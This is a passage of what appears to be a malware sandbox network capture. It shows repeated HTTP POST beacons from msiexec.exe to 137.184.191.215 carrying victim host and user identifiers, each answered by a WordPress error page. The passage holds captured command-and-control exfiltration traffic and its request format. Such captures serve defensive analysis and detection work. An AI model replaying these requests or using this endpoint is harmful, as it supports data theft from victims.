                                        Oct 2, 2024 07:20:13.219995975 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:13.220007896 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.459106137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:13.361092091 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:13.365953922 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:16.036499023 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:13 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:16.036878109 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:20:16.036887884 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:20:16.038016081 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.459107137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:16.189989090 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:16.194834948 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:19.692133904 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:19.692466974 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:19.692480087 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                                        Oct 2, 2024 07:20:19.693748951 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:19.693762064 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.459108137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:19.859668970 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:19.864464998 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:22.538747072 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:20 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:22.539127111 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:20:22.539135933 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:20:22.540229082 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.459109137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:22.693000078 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:22.698157072 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:25.272121906 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:23 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:25.272531986 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:20:25.272542000 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:20:25.273087978 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
